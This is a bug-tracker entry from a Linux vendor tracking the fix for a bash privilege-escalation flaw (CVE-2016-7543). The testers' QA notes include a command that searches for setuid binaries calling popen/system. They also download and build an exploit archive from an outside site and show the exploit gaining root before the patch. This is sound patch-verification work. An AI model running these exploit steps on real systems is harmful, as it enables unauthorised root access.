Univention Bugzilla – Bug 42874
bash: Multiple issues (4.1)
Last modified: 2016-12-01 11:57:27 CET
Upstream Debian package version 4.2+dfsg-0.1+deb7u4 fixes this issue: * Specially crafted SHELLOPTS+PS4 environment variables in combination with insecure setuid binaries using system()/popen() can result in root privilege escalation (CVE-2016-7543) UCS users use bash as default login shell, but it looks like there are no vulnerable SUID binaries in a standard installation: find / -perm -4000 -type f -exec objdump -T {} \; 2>/dev/null \ | egrep '\<popen|system\>'
/usr/lib/vmware/bin/vmware-vmx-stats /usr/lib/vmware/bin/vmware-vmx-debug /usr/lib/vmware/bin/vmware-vmx /usr/bin/vmware-mount /usr/sbin/vmware-authd /sbin/mount.cifs
To show the infected binaries: find / -perm -4000 -type f -exec sh -c 'objdump -T {} | egrep -q "\<popen|system\>"' \; -fprint /dev/stdout
OK: *** 4.2+dfsg-0.1.51.201611101755 0 500 http://omar.knut.univention.de/build2/ ucs_4.1-0-errata4.1-4/amd64/ Packages OK: zgrep CVE-2016-7543 /usr/share/doc/bash/changelog.Debian.gz OK: YAML OK: bash still works I could not reproduce it with this exploit: http://seclists.org/oss-sec/2016/q3/617
Created attachment 8255 [details] exploit.tar.gz OK: reproduce # cd /tmp/ # wget http://apt.inguza.net/wheezy-security/bash/exploit.tar.gz # tar xvzf exploit.tar.gz # make # make root # ln -sf bash /bin/sh # su Administrator bash $ cd /tmp/; make test Test 1 uid=0(root) gid=5000(Domain Admins) groups=0(root),1005(Windows Hosts),5000(Domain Admins),5001(Dom/bin/date Tue Nov 29 19:17:07 CET 2016 Test 2 uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date Tue Nov 29 19:17:07 CET 2016 Test 3 uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date ~OK: fixed version: ls -l exploit1 exploit2 exploit3 -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit1 -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit2 -rwxr-xr-x 1 www-data root 6804 Nov 29 19:12 exploit3 ./test.sh Test 1 + /bin/date Tue Nov 29 19:27:31 CET 2016 Test 2 uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date Tue Nov 29 19:27:31 CET 2016 Test 3 uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date Tue Nov 29 19:27:31 CET 2016 I still think that it is wrong that the code is executed in Test 2 and Test 3. In "Test 2" the code is executed as www-data. But well, the most critical thing is fixed.
<http://errata.software-univention.de/ucs/4.1/343.html>